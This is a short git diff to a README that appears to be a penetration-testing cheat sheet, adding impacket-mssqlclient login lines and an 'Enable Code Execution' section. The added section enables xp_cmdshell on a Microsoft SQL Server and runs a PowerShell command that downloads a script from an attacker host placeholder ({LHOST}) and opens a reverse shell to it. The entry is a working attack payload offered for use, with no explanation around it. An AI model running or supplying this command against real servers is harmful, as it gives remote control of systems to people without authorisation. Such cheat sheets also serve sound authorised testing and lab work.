diff --git a/README.md b/README.md
index 7c6003c..efe7b55 100644
--- a/README.md
+++ b/README.md
@@ -594,8 +594,13 @@ nmap -v -p 139, 445 --script=smb-os-discovery {IP ADDRESS}
 
 
 # Impacket-mssqlclient
+impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} 
 impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} -windows-auth
 
+# Enable Code Execution
+SQL> enable_xp_cmdshell
+SQL> EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://{LHOST}/rev.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress {LHOST} -Port {LPORT} | powershell -noprofile'
+
 # Note: Requires credentials
 # {IP ADDRESS}: IP Address of the Server
 # {USERNAME}:   User Authentication